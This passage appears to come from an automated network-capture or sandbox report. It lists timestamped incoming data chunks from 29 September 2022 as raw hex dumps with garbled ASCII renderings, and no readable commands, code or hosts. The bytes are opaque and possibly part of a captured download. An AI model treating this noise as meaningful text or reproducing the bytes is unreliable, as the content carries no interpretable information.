c4 99 45 a7 18 b3 9c 30 cc 5a 38 3d 8a d1 cc 2c 07 e0 c9 68 60 da ec 0b 8f aa bf 55 8d da c9 c8 0a d4 39 02 ae 9c e5 3f 22 0c 69 6d ae 0f 0a 4e 77 bd 63 fb f4 d3 b9 ab 12 fe
                                                                                                        Data Ascii: eYt9[)e:JsY)t$+gDz+T'jnd~h0az=qz]~t,wL~OR555ekLNVC'aJs6IBEF?G `b2{0/O2M!E0Z8=,h`U9?"imNwc
                                                                                                        2022-09-29 12:46:11 UTC10142INData Raw: 44 af 80 01 79 f8 d8 19 3d 65 39 b1 c9 d3 f2 c5 c4 aa 7b 06 bb e1 a7 2a 9d 09 0e a8 e2 d7 c2 9a 50 49 7a 14 e0 c6 bf 84 5c 19 17 2f 6a 4a 25 8c 6d f7 53 52 ca 05 52 69 b9 84 77 53 9a 46 b4 ae 53 c2 13 52 39 99 a3 e3 8f b8 44 d1 1d 3c a8 11 8b f9 8f 17 9a 0e 32 c8 aa 7f 0d 15 a5 40 d6 60 f2 84 4a c1 98 7d 6e ae 6a 5d ab ee 7b 59 9f ad a8 cc 73 ff 5d 9c 1d ea f8 8f d3 6c 34 12 f1 78 d6 63 cb d8 09 3a aa 6c 12 b8 08 d1 65 8d 7c d9 c4 08 20 4f b9 99 b6 2e 78 09 68 f3 16 28 c2 4d 1f 21 2a 6e d7 5d 81 03 8e 5a 21 6a 29 09 a9 73 63 ab 4f ec e1 fb 7d 39 44 0c d5 d2 c7 ac 04 63 2e f5 0f 22 f0 10 9b ad ac 07 98 9e 0b be 76 8f 21 84 28 e9 0a 6c 71 8c 49 13 1d 56 e0 89 7f 95 e6 56 94 88 0d 45 6a 98 29 d5 1c ed 83 4b 55 4d 4d 75 d4 10 80 3a 1e 9c c5 ec 5c 46 68 93 cb
                                                                                                        Data Ascii: Dy=e9{*PIz\/jJ%mSRRiwSFSR9D<2@`J}nj]{Ys]l4xc:le| O.xh(M!*n]Z!j)scO}9Dc."v!(lqIVVEj)KUMMu:\Fh
                                                                                                        2022-09-29 12:46:11 UTC10158INData Raw: 30 b0 fe 31 ed da df e2 99 e3 b3 49 37 0c c0 23 be 61 b8 11 36 e3 46 00 af 80 d3 99 b5 d6 5c 8f 90 fc 93 97 a2 bc 61 9a bb 80 3e 85 42 53 97 3d d3 6c 9a e8 fe 88 84 35 8e d1 6b 31 16 c2 9b 41 f1 6e 09 53 94 80 8d a4 28 09 58 7f 33 ae e9 d6 73 d1 99 e8 7a b5 fa d8 79 b8 c6 cc e4 b9 5f 01 c0 96 f1 10 59 30 8c 4f f7 80 73 34 9c 2f 5c 75 80 a9 63 38 20 1c 9a 46 3b 2c 98 40 ba 12 35 86 6c 26 f7 f1 ef 79 86 a2 ba 68 6f 4a f8 74 05 97 91 4e ac 23 d6 a6 f8 35 9c 80 5c 4c 95 57 bd 15 f2 7e bf 79 08 cd 0f f3 6a 2b 6a 9b 59 97 ef 50 49 18 ff a6 ad d8 01 37 7d 1c 73 cc c7 26 75 19 40 50 24 8a b1 06 bc 28 70 bd 71 8f 73 80 80 b7 bf 3c 9b ef 03 30 8a 50 4e d1 41 59 f6 cb 06 38 7c be 3c 72 b8 8e f2 02 95 62 59 8b e0 85 f6 32 99 43 ab 38 cf 65 64 da 92 13 a3 92 d6 01 c1
                                                                                                        Data Ascii: 01I7#a6F\a>BS=l5k1AnS(X3szy_Y0Os4/\uc8 F;,@5l&yhoJtN#5\LW~yj+jYPI7}s&u@P$(pqs<0PNAY8|<rbY2C8ed
                                                                                                        2022-09-29 12:46:11 UTC10174INData Raw: 2f 8c 2e 98 b2 7f c1 11 dc 76 aa 03 d0 93 b7 4c 25 9c 65 2a c7 86 71 0f 99 ae ce cc 6b 7d 26 d4 9e b5 f0 36 f2 33 c6 9a e8 a8 df 42 2a d3 84 f3 c4 65 6f ea e8 bd 2f 8e 17 d8 64 1d 89 c1 7e be c5 18 91 25 15 45 e2 45 a6 4f 09 8c 7b 6c 5c d3 55 c7 fb 67 dc 74 0f aa 76 2a bf e2 99 3e 4b e0 94 0f 3c a6 58 a7 ef 53 3e 0c 73 0b b0 4b 7b 32 52 1f 88 3d d7 c7 16 02 14 ec 1c 4d 88 9e 7f 13 51 7e 4f 6d 3d 1c d7 1e 1b 21 37 53 6d 03 69 8f 03 a9 5b 29 42 8f bb 2c 63 57 c6 97 4a c6 72 e0 6c 63 13 0f 77 06 76 0a 85 76 f6 f3 34 c0 d5 e8 0c b5 65 07 bb 12 be 57 2f 61 59 3b fd 7d c1 87 aa 3f 75 a1 65 25 6f a4 d4 74 db 12 31 38 ac 17 e5 cf e2 5b a6 9e 5c bd fd 8e 8f 81 9e 5e 0d 1d 98 62 6c 0c 0b 6e 6e 15 1c d2 1b 6b 06 ad 49 8a 99 73 2c f6 bf 3d e3 43 b9 cd 10 37 9b fe f1
                                                                                                        Data Ascii: /.vL%e*qk}&63B*eo/d~%EEO{l\Ugtv*>K<XS>sK{2R=MQ~Om=!7Smi[)B,cWJrlcwvv4eW/aY;}?ue%ot18[\^blnnkIs,=C7
                                                                                                        2022-09-29 12:46:11 UTC10190INData Raw: 81 70 9a b9 48 5c 92 8d 0e 70 8d 4c b3 bc 58 18 ff f2 a8 4a 72 6b 67 b6 14 4a 54 aa f7 1d 85 50 ec ce 85 27 61 a5 bf df 2f 79 36 bc 3c fe 97 1c 06 3a c6 3e e7 8c 9b 8e 89 ce 8a 77 26 ca 7e 90 39 d1 86 e0 6a 85 9c 1a 05 1b 7a 96 90 14 2e b8 07 d4 6c 88 8b b7 b2 69 0c 7e 16 73 88 06 a5 a3 f6 fb 92 fd ec 71 e0 e7 d7 8a 8d 41 05 53 1e 82 2a 24 8b 15 63 66 db bf 34 c3 37 4b d2 48 07 5e c7 d1 a9 eb 0e b9 4d 75 77 ba a8 99 82 b9 6b 36 72 d5 11 c8 be ec 6e 6e a3 0a c4 79 9b c3 e1 40 23 05 83 cc a2 86 cf da 61 d4 9f 6b cf f1 eb d4 72 2d 59 ff 5c 0e 18 5c a8 87 63 c6 44 65 11 70 d2 ae d7 38 59 2c 8c 2e 87 08 c1 2c 0e 1d fa cc 4e 31 b9 0d 95 14 42 d0 72 0b 39 33 04 7b 22 8d 3f a6 01 a6 b7 6e 80 98 9f 2c b9 ad 55 9b b2 14 ee 4a a9 3c 9f 92 92 ab 65 f7 76 2a 14 03 14
                                                                                                        Data Ascii: pH\pLXJrkgJTP'a/y6<:>w&~9jz.li~sqAS*$cf47KH^Muwk6rnny@#akr-Y\\cDep8Y,.,N1Br93{"?n,UJ<ev*
                                                                                                        2022-09-29 12:46:11 UTC10206INData Raw: 16 7e f7 eb 3b 37 e0 cd 16 c7 6f ea 78 30 e0 dd 24 92 9e 42 25 53 71 13 12 5e 87 f2 de a1 12 9f ac dc b6 39 0c 7a 05 82 2b 54 84 bf 3c f6 46 5a e4 52 67 0e af 83 6e 9b 2d 30 86 cd 39 1c a2 4b 0e e2 14 df 32 4f d9 ea b4 ac 3c f4 e0 90 17 9e 94 0a eb db 09 06 ea f0 e6 b1 74 41 20 2e 72 c1 12 6f 6b bc e5 2c 3f f4 47 c2 fa 72 bd 6d 66 57 02 df 3f 18 e2 3d 29 ed b9 17 d7 66 98 b5 de d2 06 b0 ee 9e 57 1e 81 66 c8 ab 71 6c cc 4c 72 ee 42 3b cd a6 8d af 3b 8f 3b cd de d2 57 87 1a 2c 48 7b 9a 1e da af 0a 2b da ec b8 e6 35 2a bf 1e 7e 0d 55 6e 1a 37 cf e8 ac 26 c9 8b 99 9a 60 33 83 f3 75 c8 99 6b 34 dd b5 81 07 ad e9 4c 96 d9 b0 51 02 69 2a 83 fd ac 65 c1 fb 36 64 6a 1d 46 65 a1 fe 29 b5 0f 28 4c 81 68 b5 3e 49 a8 48 49 76 57 8b 00 50 72 fa e2 be 45 0b cd 64 45 a8
                                                                                                        Data Ascii: ~;7ox0$B%Sq^9z+T<FZRgn-09K2O<tA .rok,?GrmfW?=)fWfqlLrB;;;W,H{+5*~Un7&`3uk4LQi*e6djFe)(Lh>IHIvWPrEdE
                                                                                                        2022-09-29 12:46:11 UTC10222INData Raw: 61 14 74 b3 d5 8e 5b 78 d7 f6 83 16 ea 41 af c2 e5 48 38 8b 79 1f 9c 33 13 f0 d1 83 da 48 bc aa 2a f3 4c 05 a1 8b bb 00 ec a1 32 b3 61 96 85 4b 4b 9b 96 2c 0a ff 68 55 aa 58 79 7a ba d7 27 cc 77 fa 85 05 e3 08 cb f3 c4 d4 56 45 0c 57 6a 11 b3 24 0d 71 d0 4c 2c 0e f4 13 8f 79 6f 42 4a 44 11 f7 7f f6 00 84 ad 4b b6 be e4 96 cd 41 c9 87 1e 63 e4 43 97 be 64 d6 75 a2 60 07 4e f0 1c 66 9a 32 c4 2d 7c 27 9d d0 b8 e1 1f e1 16 18 43 6b 13 6b 67 e4 d9 ca b7 f5 7f 90 ae 78 d7 05 73 1e fc 8d 25 3b 9e ba 89 47 d5 f7 92 b6 1d b4 18 f0 82 5c fb 9e 31 2e f9 c4 85 5f be 30 23 c2 f9 32 60 ab 59 bb 5d 37 79 62 b3 3b d2 f1 44 6f 0e 29 a5 78 3c d6 71 a7 f9 05 2b 02 40 eb a4 d3 8c 2f d2 37 fc 9d f2 8e f3 85 05 3d ac 60 9d 8d 6d 52 2e 57 cd 64 c2 32 a1 00 16 e7 a3 ed 40 24 16
                                                                                                        Data Ascii: at[xAH8y3H*L2aKK,hUXyz'wVEWj$qL,yoBJDKAcCdu`Nf2-|'Ckkgxs%;G\1._0#2`Y]7yb;Do)x<q+@/7=`mR.Wd2@$
                                                                                                        2022-09-29 12:46:11 UTC10238INData Raw: ac 18 c7 b0 62 08 1b c1 57 ab 33 4f f2 a9 f1 21 83 1f 16 77 83 c0 28 66 2a 46 cb 04 62 60 ce 5d 8d 19 56 42 15 53 5b 7f 6e c7 8e 01 fe 38 63 b9 10 3a e9 80 7e 56 81 31 c7 14 56 7b ac 67 c0 7b 2d 14 a3 9e 79 95 3b 3e 86 7f 71 99 a4 c7 32 8a 36 47 80 50 38 56 c4 b6 65 ee 26 27 eb b7 5f 07 65 40 8b 82 00 e9 91 f6 0f 6c 75 b0 41 ed 54 3b ca 87 ac 77 ac 26 fc 40 36 5d 32 d6 0c 1b 69 b2 9b 3b 9c ad fa 52 0e 16 fa 95 41 59 94 00 1c ac d9 4d b0 89 6d 6e 9d 39 99 07 a4 1f 8b 18 c2 8f 0c 37 61 37 0f 14 2b 03 a8 0a 57 45 20 cb 81 7a bc 79 75 68 da 99 58 20 66 98 fe 9f 17 31 b3 e9 a3 41 d5 6b a5 68 95 a4 4f 74 e3 01 55 01 4f 50 7d 8a b5 67 19 b1 af fe 62 51 ba 96 12 52 50 75 02 73 7d 34 76 64 e3 a6 7f fa d5 5d 63 4b 07 10 f7 9a 10 f5 13 52 a8 bd 70 eb 00 a7 76 de 19
                                                                                                        Data Ascii: bW3O!w(f*Fb`]VBS[n8c:~V1V{g{-y;>q26GP8Ve&'_e@luAT;w&@6]2i;RAYMmn97a7+WE zyuhX f1AkhOtUOP}gbQRPus}4vd]cKRpv
                                                                                                        2022-09-29 12:46:11 UTC10254INData Raw: 47 b7 6c 46 ec 32 6b c1 a0 f4 ac b9 fe c2 32 b2 a7 a7 e1 26 7f b1 db 02 49 a1 6d 66 b4 bf 80 39 28 65 8a 32 d5 2d d2 1a 8c 9f 17 c8 cb 9f 8b 3e 00 02 c0 cf 29 43 0c 4a 3a 54 f8 44 7e 45 e3 9f 3a 78 14 45 7a 9c 6b 9e 1b 51 53 55 68 b3 04 8c 0b 4c 58 90 57 d5 6d 17 09 75 92 ca 4c 6d 67 ac b9 5e a1 19 0e a3 5b 51 c2 eb 05 66 be 26 46 fa b1 c9 99 63 2e c6 4d 44 82 e2 a7 e2 0b ca 28 6d d9 d5 09 3f db c9 76 ce 58 dc 60 30 99 ba 24 d6 2d a8 31 fd 4f 42 fb 52 84 bd 7c 77 a4 83 9b 4e b7 e2 34 64 60 88 2f 78 68 0f ca b1 de a2 21 1a 33 46 d6 7c 1a d8 aa 48 95 1a b5 01 32 05 a3 b3 e0 60 6a 45 ca 18 88 40 02 f6 b5 91 3b 83 e6 32 db 51 7b 10 53 2f fa 52 2c 1e f3 fd ef 59 94 ba e3 a3 2d fa b4 cc 45 53 01 16 5b d3 d4 9f be 90 f3 a1 86 d4 dc 58 06 4e 64 cd 87 c6 42 5a 7f
                                                                                                        Data Ascii: GlF2k2&Imf9(e2->)CJ:TD~E:xEzkQSUhLXWmuLmg^[Qf&Fc.MD(m?vX`0$-1OBR|wN4d`/xh!3F|H2`jE@;2Q{S/R,Y-ES[XNdBZ
                                                                                                        2022-09-29 12:46:11 UTC10270INData Raw: 14 d2 95 55 fe 13 d0 8e 2d 4a 37 7b 47 a5 14 6f d9 a7 25 5f 80 2b 05 6c 16 11 ea 40 a1 bc c7 7f 61 0f 57 c3 8c cc 5e f4 18 ad fc 66 21 ae c5 d4 5d 86 29 b9 93 3f f9 05 92 93 5b 25 08 6c de 7b 18 27 03 bf 93 85 09 c6 38 2b bc 71 6c 90 b5 f1 fc 83 da 5a ba ad 30 f9 ad 78 da 9e 67 0c 9e 64 7d d8 cc 70 5f 7e b1 e5 66 d4 54 bb ec e0 82 8e b3 58 f1 23 a8 3f ef 1a 63 65 03 a9 01 1b 1f e0 e1 62 cb 17 5d 74 2a 45 47 13 bb 6f 92 f4 02 fd 39 22 ef dd 5a 45 70 36 ad f6 ee 20 b3 d3 5e 30 e9 f1 87 5b 03 6e 78 0a 62 14 c3 89 49 eb ab c6 6e c9 75 1e 42 60 df 3a ba 23 cb 6f 4d 81 e8 81 d8 0f 92 fe 2b ab 47 c2 5d 7c 39 49 e5 30 a7 1a c8 21 3e af 5f d6 09 3b 24 4d 3f d8 99 09 28 a2 ce 24 e9 d5 c2 f9 bf 86 a4 ce 04 2e 38 c8 ed 3b 6c ad 4a 68 4a 74 7c de 2e 5a dc be 15 4d 95
                                                                                                        Data Ascii: U-J7{Go%_+l@aW^f!])?[%l{'8+qlZ0xgd}p_~fTX#?ceb]t*EGo9"ZEp6 ^0[nxbInuB`:#oM+G]|9I0!>_;$M?($.8;lJhJt|.ZM
                                                                                                        2022-09-29 12:46:11 UTC10286INData Raw: 1f 42 25 be b4 4f 28 71 d8 29 9a bb d5 46 4d 4d b3 0f cc a8 0d 73 4c ed 17 8a ff 00 05 5c da e7 b0 f3 93 93 dc 04 bd 48 36 ab 3d f8 c8 41 b0 66 d7 33 b1 7e d8 ce 08 8b ac 0d 57 eb 09 57 9e 1d a4 c6 07 46 8b 38 d4 9a f4 44 fc cb 9c 8d d1 f0 ad e4 68 b3 1f 02 0d a1 19 d0 31 43 61 3a d9 d7 d2 44 34 26 fc bc 30 ed 97 cf c4 86 0f e6 b5 e7 2b 19 a8 a3 a3 ba c2 a4 38 4d df f0 b9 78 4a b6 9a 04 51 15 c5 3b 32 5e 49 64 b4 74 74 2d 0c e5 90 d7 bc 46 63 98 4d 82 89 72 b9 67 a5 c9 40 53 ed e8 12 8e 0f a8 00 c7 58 ab af 4c 5e a3 11 55 3e 7a bf 54 91 82 68 b7 db 70 cf 26 a3 0c 9e 18 7f 1a 94 fe 34 da ca b5 ff 57 e4 17 66 d3 d0 48 37 6e a6 28 71 da e4 f2 67 23 da e7 6f 26 c0 b8 da 09 0b 5a c6 15 62 94 5e c0 65 af cd 6b 13 98 77 f4 cf 06 9b 66 0a 1a e2 10 9e 66 85 e1 ed
                                                                                                        Data Ascii: B%O(q)FMMsL\H6=Af3~WWF8Dh1Ca:D4&0+8MxJQ;2^Idtt-FcMrg@SXL^U>zThp&4WfH7n(qg#o&Zb^ekwff
                                                                                                        2022-09-29 12:46:11 UTC10302INData Raw: 72 d4 8a 31 95 37 c6 3a 44 44 34 35 2e 2e a1 65 dd 0c 09 ef 60 5b 0e 42 f4 01 f0 95 1d a6 f2 1f c7 b3 72 79 22 e7 86 1d c8 4f 55 f4 90 bc 14 f4 ee 9f e5 3c 78 ef 7d 53 e2 4f 2d ae f6 3b 60 ed 76 f6 6e fd 1e 64 15 76 5b 8d 33 fc 67 3b f0 13 b6 c4 4c 2a 68 dc 48 01 cc 08 ba 39 08 ac c6 89 a4 9d f5 a6 b3 1e ec 09 1e f9 60 be 7b 39 85 7e b6 81 ac eb fd db ac 79 d2 b6 28 1a fa af 44 76 9e 7d 07 43 a5 9e 65 6e ee 4e 0e 0b 7d c0 3a bd b8 0d 2e 06 e3 a4 37 67 25 f3 cd be 9b 99 d0 9f c0 bd e6 be c5 b8 cd 49 78 1c 70 7c 9b 40 ac 24 cc c3 43 0b 80 6d 2b 33 89 40 e3 f3 9f a2 32 47 16 0f b1 a0 13 bd c8 19 5d 70 e9 70 8d e3 9a 7c 2c ab 73 fb 84 c8 06 11 0f be ac 54 2b 5a c2 22 89 b5 e1 74 29 ab 87 89 57 d6 2e bf 5f fe 02 04 d5 a4 67 f7 1d a7 0e 43 0e 45 39 5e 6d 0e c3
                                                                                                        Data Ascii: r17:DD45..e`[Bry"OU<x}SO-;`vndv[3g;L*hH9`{9~y(Dv}CenN}:.7g%Ixp|@$Cm+3@2G]pp|,sT+Z"t)W._gCE9^m
                                                                                                        2022-09-29 12:46:11 UTC10318INData Raw: 0d f8 43 7c 39 ce 6d 88 96 9b 94 33 0c b9 bd 31 fb fe 00 aa 96 89 c3 17 a9 29 8e 3a 24 ef c4 22 fc 2f 50 9d ea 4d cb bb 7c a8 d4 fa 0b 05 d7 f4 d5 fd d5 0c 65 83 ec 6b 70 f3 84 33 a8 da fc d4 39 6a 42 0a 88 47 99 bb 66 fd 55 2f 57 b3 fc 7b 20 95 60 80 94 e7 3c 2e 5d 62 9d 02 87 d7 25 83 79 03 20 e4 fc 3f 17 25 4c 84 9a 05 d9 6c 39 47 a2 67 6f 65 2e 05 0b 26 98 59 a3 7f 56 ab c0 01 35 0c d6 f5 78 3f fa 44 9e 45 74 cd 2c 30 6c 32 e0 76 55 a5 04 4e f1 54 69 f7 17 11 f1 b9 35 31 77 27 aa ae 64 41 34 fc 86 11 d9 6e b9 e2 99 2c 65 26 bd 0c 77 3e a1 55 60 e7 0c 17 07 26 f6 09 6d 7d 9f 01 01 c5 45 fd 05 fc 33 24 6d 82 6b b9 4b 69 b6 4d 1b a0 df d3 d5 00 fc a8 92 f8 79 47 33 4e 2d e4 36 69 18 ca ed c2 1a 10 b5 21 07 44 f0 fe 3e 0f 04 60 8b db 1f 06 02 55 ac 67 e6
                                                                                                        Data Ascii: C|9m31):$"/PM|ekp39jBGfU/W{ `<.]b%y ?%Ll9Ggoe.&YV5x?DEt,0l2vUNTi51w'dA4n,e&w>U`&m}E3$mkKiMyG3N-6i!D>`Ug
                                                                                                        2022-09-29 12:46:11 UTC10334INData Raw: 88 b3 20 c6 00 64 36 df 30 0d d5 b7 2a 51 14 fc e5 ff d2 32 c0 fd e6 51 58 07 da 30 f3 57 68 42 49 23 20 0d e3 63 9f 34 e6 11 3d 09 7d 5f c0 96 87 fd c2 54 e7 87 f6 fa a9 4d 75 42 76 22 c6 1d 71 aa e3 1d 63 05 df b6 2e 52 08 d8 06 69 da 2f ca dd 01 58 34 95 a8 ca 10 24 e8 aa 88 21 0b f9 18 13 d8 88 ab 34 39 52 fd 44 d0 70 47 ef c4 3d 85 81 be 06 c5 78 8e b8 96 a1 d8 2e 2a c8 be e8 2d 04 93 8a dd 88 0e 77 27 fd 20 5d 8b 39 73 9e 5d b5 4b 02 23 51 85 d8 91 95 4d 50 71 9f b0 62 62 1b 8f 02 4a 52 27 f8 b4 4c 14 5b 18 61 cb cf 1e a6 c4 77 d1 5a e9 8e 96 7c de 06 aa c4 20 68 f8 cd e7 1c 34 a2 29 12 d6 cb 31 d0 36 27 78 cb d1 1f 72 13 1d 03 1e ff 25 41 78 a7 80 6e 7f e2 d9 f7 19 33 9d ff 95 6d 8b 73 cb 5b 0f 8f fa 69 4f 27 b0 fb 94 e2 03 de 1d 38 eb da 34 3c 23
                                                                                                        Data Ascii: d60*Q2QX0WhBI# c4=}_TMuBv"qc.Ri/X4$!49RDpG=x.*-w' ]9s]K#QMPqbbJR'L[awZ| h4)16'xr%Axn3ms[iO'84<#
                                                                                                        2022-09-29 12:46:11 UTC10350INData Raw: 80 71 ad b9 8b 5f 8e 3d 62 dd 25 2e 9a c0 62 12 5c 57 38 d7 61 45 76 50 c2 8a 26 ea 9a 79 13 70 7a a8 a0 7d d4 70 28 fd ef 21 78 38 fb 90 ac 58 07 2c 7b da e1 de a7 50 2d f4 e9 79 f5 ac 5d 4b ee f1 7e b2 dd aa ac a6 b7 bc 1f 5b 87 7a 1e a3 fd df 53 f6 3b 57 c9 c2 b5 4b e4 6c 16 8e fa 5e 4a 4d f6 3b 1f 15 ef a9 78 6d b5 f4 bb 6f f8 40 08 8f 61 0e b0 96 9f 33 1b 1a 9c ff 40 8b 59 80 ca 90 c2 e9 8c ed d2 6d cd c8 60 f7 22 ea 94 b3 d4 d0 c8 09 8d cb 22 c5 88 a3 99 e1 82 53 3a a3 91 23 4c 77 63 5a 4e 9f 20 ce 64 43 ad 26 88 c8 46 28 22 3f ee 37 51 37 85 66 04 71 a0 0d aa dc 02 53 f7 82 a3 d3 eb a3 59 2e c5 87 aa f3 6d d0 c4 b0 1e 20 6a 64 4f 06 67 10 57 88 a9 1b eb 8f 09 a4 8b a5 5f 2b 79 18 4d ec 2e b9 59 69 ad 49 0e de 2a b8 92 35 5a 8d cb b2 69 a9 6b 37 c8
                                                                                                        Data Ascii: q_=b%.b\W8aEvP&ypz}p(!x8X,{P-y]K~[zS;WKl^JM;xmo@a3@Ym`""S:#LwcZN dC&F("?7Q7fqSY.m jdOgW_+yM.YiI*5Zik7
                                                                                                        2022-09-29 12:46:11 UTC10366INData Raw: 10 89 84 c9 b9 23 0a 21 6d 0a 2b e9 3a 0e e5 37 12 39 de de 47 ca 3e 99 32 1a c1 4b 19 da 7e 56 c1 10 07 6a 20 65 39 87 13 58 50 20 80 a4 2f 2b 56 9c 54 f7 f0 64 df 79 17 9b 6e f2 c7 df 24 d4 10 2a 0b d6 df 0e 4c 03 51 9f 44 15 be de db 78 1f 8f d5 18 a9 da 92 d9 26 d1 52 1d 2e 46 36 3b f6 75 e0 d7 7b 55 1a 89 d4 a2 19 93 77 23 a4 77 5f 70 ee 68 12 b5 2a 86 fb eb e4 35 1a d8 1d f9 8f 3c 5d 8e 86 6d bc 78 f2 db 68 f8 be 56 e2 67 ee 23 a6 61 97 43 91 b0 7b 9a f9 71 c7 8b 1a 43 72 6a 35 3f 0b 68 d2 8d 6b 70 aa bf 17 9a 09 55 5d 9a 4d b7 54 fb 22 d9 5c 1e 26 c1 b1 ce ab bf 07 76 f6 67 0f 6e 2a d6 05 4f f3 1e bd 5c 37 56 00 19 80 1b 76 da 48 97 7d b8 5a cf 2a 08 05 eb f2 e8 4f 7a 45 48 9c 8b c7 eb 2a d3 35 03 b7 34 f7 ff 95 0f af d6 d9 97 db 33 78 5f a7 5c e8
                                                                                                        Data Ascii: #!m+:79G>2K~Vj e9XP /+VTdyn$*LQDx&R.F6;u{Uw#w_ph*5<]mxhVg#aC{qCrj5?hkpU]MT"\&vgn*O\7VvH}Z*OzEH*543x_\
                                                                                                        2022-09-29 12:46:11 UTC10382INData Raw: 04 9f 6d 42 ab 1f 67 b6 57 ce 60 e4 52 26 09 b3 58 8f 19 57 75 f6 6f 9e e8 bc 23 3f ff 70 1f 18 4f e8 44 42 63 a4 81 11 2f 4c 99 4a 61 ee 07 8a 46 18 f1 03 3c c5 07 9d 4b 42 f7 8f ff e3 13 e6 3d 7b 4b 56 09 64 ba 65 98 f1 15 04 27 9b eb c8 16 fe 9b 55 4c 6a b9 12 39 66 94 21 70 82 a6 36 2c bb 51 71 13 2c c2 ae 51 e1 14 75 cf db 2f ac 05 11 01 03 51 b8 46 8e 78 38 1c 5a da 09 4a 27 5c 42 34 a6 5f c7 7a 72 64 ce a8 c2 10 4c 03 f7 00 05 47 6e 26 1b b7 48 9c 9e 11 3e 52 34 c3 e7 73 15 05 cc 9e 3e 08 3f 6e 71 82 bc 9a d6 fe 7a 94 b1 f5 b2 3a e6 9f 9b c5 50 c6 7b 85 42 d1 0a 86 70 dc 05 ec 3b d8 f3 98 67 89 3f 3b 6e 12 13 48 1c a7 b0 ad a0 19 8c a6 fc dd 81 aa d8 4e f1 44 31 1e 49 d8 6b f2 ce 19 54 df 48 75 7e 11 04 f6 97 1d 24 8e 65 17 78 d6 40 c1 11 17 62 0f
                                                                                                        Data Ascii: mBgW`R&XWuo#?pODBc/LJaF<KB={KVde'ULj9f!p6,Qq,Qu/QFx8ZJ'\B4_zrdLGn&H>R4s>?nqz:P{Bp;g?;nHND1IkTHu~$ex@b
                                                                                                        2022-09-29 12:46:11 UTC10398INData Raw: fe 2d c2 6f 2d 29 e5 51 cd 06 0b 04 eb a6 78 4e 27 e6 63 e2 2f 87 7b 43 53 a8 f7 a6 bf 31 4b 13 5f 8d 59 c4 b8 1e 2a af 63 1e e2 09 74 cc fc e7 4b 18 b7 07 cc 64 44 03 be 1d 46 9d ec fb 28 a8 6d b3 36 51 a8 7b 3d 44 82 5a d9 16 5b 90 c1 bb ea a3 0f 50 45 fa af 07 ae 05 e1 20 18 90 14 a9 56 5a 4c 46 1f 30 18 f2 e9 e9 e4 f6 d6 63 d0 a7 68 e6 0e 88 96 3e e9 db ce e5 59 d5 b4 6a 56 ca d9 26 b7 d7 0b 05 b5 e0 e0 0b 5d ab 57 3c 1f 7b cf ad 9c 34 48 22 85 d3 52 c1 0f 56 40 ab 18 14 9a 34 06 40 28 23 f5 e9 52 f9 de a8 e1 11 08 f2 6d 0d a1 e5 e8 59 cf 8b 8e f0 1b 72 4b f1 84 de 58 de 90 28 07 7c ae ab 70 89 37 96 6e d8 1e 5f 02 f4 62 c1 5a a0 3b fd 2a 91 5c 72 7c 37 9e 9f 49 bc eb 2a d7 e0 bc 49 ff 23 9c a0 e2 32 ac 72 ba 76 1f f7 87 f1 ad 1c 18 ed 11 10 c8 18 e4
                                                                                                        Data Ascii: -o-)QxN'c/{CS1K_Y*ctKdDF(m6Q{=DZ[PE VZLF0ch>YjV&]W<{4H"RV@4@(#RmYrKX(|p7n_bZ;*\r|7I*I#2rv
                                                                                                        2022-09-29 12:46:11 UTC10414INData Raw: e3 f7 b0 19 09 2c ec 2c 9c 0f 13 80 9d 42 5d f9 e8 3d b3 92 e1 d2 ef fa e5 0d bb 75 50 55 63 4e 13 70 fd 2b 7b b6 f5 39 b6 1b f7 c9 9d 8e dc 75 20 3e 2e 04 b7 42 56 b7 b5 3e e5 5d cb 8b cf 16 95 42 3a 52 9d ab 87 f5 af c6 82 28 04 71 1f ef f5 57 ff ca 80 b8 98 58 61 6d 82 cb 07 37 e3 ea 65 05 7e ef 4d 27 56 58 d3 20 b0 d1 73 85 af 7f 2c 55 88 b4 38 3d c4 9f 74 7f 8f 79 5e 4a 22 ae 4d 06 a3 3d 43 d9 b4 6a 90 b5 4e 6a db 3f 10 ce 7b 07 97 2e 00 48 36 76 4d 79 7d 19 e0 71 14 08 ba 05 cf 2a da a2 0c f9 27 04 b3 3a 46 b3 be c1 a3 b8 34 f3 e8 4f 90 ae c9 77 e1 8a 84 a4 84 43 97 3d 95 1b 9f 7c 26 cc 2b 35 df f0 c7 86 02 a1 1b 82 47 8d be ef 09 7a de 7b 39 a3 7c ce 5f 94 b7 cd 88 c2 60 66 8c e6 9c f4 a0 ed fb dc d0 62 a3 78 cb 43 84 db 77 65 df 4a af bd 4c 3b b0
                                                                                                        Data Ascii: ,,B]=uPUcNp+{9u >.BV>]B:R(qWXam7e~M'VX s,U8=ty^J"M=CjNj?{.H6vMy}q*':F4OwC=|&+5Gz{9|_`fbxCweJL;
                                                                                                        2022-09-29 12:46:11 UTC10430INData Raw: 7c b5 a6 af 1e 9c 5d 6a 73 d2 25 dd d0 d6 fa 84 5c 8a 7e cc b6 80 ae 1e af 1d 0e df 7d 94 ad 1e 68 b4 83 30 0e d9 f2 30 d0 76 7f 5b 30 72 25 2f f0 87 1b 44 c0 b6 e2 89 b8 aa 16 dd a9 bb c3 25 75 ed a6 39 3e df af 45 d0 62 ef e2 73 a1 b8 35 69 ec d7 76 43 95 86 a4 87 19 5c 49 cb 13 90 b9 65 64 84 2f bd aa 22 51 a6 5a a9 b7 5b 8c 2d 41 61 df 82 7c 20 bf 39 52 9e 3a 38 6e 60 f7 03 a8 8f e3 71 7f 48 c9 97 93 d0 d1 39 fc 37 f7 4d 4b 64 8f b5 c6 2a b0 38 f1 6f 85 47 2a 51 53 94 aa 25 eb 06 1b 98 b5 89 ea 0c 03 29 2b 85 1b fa 02 32 7a 28 06 3b 66 24 e2 f1 f0 40 b5 ce 7b ff b4 fc 5c 35 5f 6c 65 e0 2f 2f 9d 0a 15 8e da 94 0c c1 43 87 a0 92 2b 3d 1f 5f 82 71 b3 b7 ad 6a 64 61 05 a6 0d 38 62 22 1d c6 ef 9b a7 92 02 4f ed ec d1 64 f3 f6 72 71 96 48 d3 db 3c 2e 7b 38
                                                                                                        Data Ascii: |]js%\~}h00v[0r%/D%u9>Ebs5ivC\Ied/"QZ[-Aa| 9R:8n`qH97MKd*8oG*QS%)+2z(;f$@{\5_le//C+=_qjda8b"OdrqH<.{8
